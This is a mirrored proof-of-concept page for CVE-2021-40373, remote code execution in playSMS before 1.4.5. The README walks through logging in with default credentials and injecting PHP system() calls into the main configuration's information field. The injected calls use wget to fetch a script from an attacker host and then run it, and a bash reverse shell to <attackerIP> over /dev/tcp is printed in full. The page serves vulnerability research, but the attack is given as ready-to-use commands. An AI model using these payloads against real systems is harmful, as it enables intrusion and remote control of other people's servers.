CVE-2021-40373 PoC — playSMS代码注入漏洞

Source

https://github.com/maikroservice/CVE-2021-40373

Associated Vulnerability

Title:playSMS代码注入漏洞 (CVE-2021-40373)
Description:playSMS before 1.4.5 allows Arbitrary Code Execution by entering PHP code at the #tabs-information-page of core_main_config, and then executing that code via the index.php?app=main&inc=core_welcome URI.

Description

CVE-2021-40373 - remote code execution

Readme

# CVE-playsms


There is a vulnerability in playsms 1.4.3 that allows potential attackers to execute remote code execution.


## how to reproduce RCE (shell):

https://playsms.org/
* docker pull playsms/playsms:1.4.3
* docker run -d -p 80:80 playsms/playsms
* login using admin:admin
* http://127.0.0.1/index.php?app=main&inc=core_main_config&op=main_config#tabs-information-page
* host malicious bash file on attacker machine
* download the malicious file using wget on the machine
* enter `<?php system("/usr/bin/wget http://<attackerIP>/rev.sh"); echo "done" ?>`
* save the information (it will disappear from the input box but still work)
* http://127.0.0.1/index.php?app=main&inc=core_welcome
* reload the page http://127.0.0.1/index.php?app=main&inc=core_main_config&op=main_config#tabs-information-page
* chmod + execute the shell script - `<?php system("chmod +x rev.sh && ./rev.sh") ?>`)
* save and visit * http://127.0.0.1/index.php?app=main&inc=core_welcome to get code execution
* run local netcat handler to catch remote shell


## rev.sh
```bash
#!/usr/bin/bash
bash -c "bash -i >& /dev/tcp/<attackerIP>/1234 0>&1"
```

File Snapshot


 [4.0K]  /data/pocs/30844a800fc9d73c3dd23c70f91e9ce384029610
└── [1.1K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!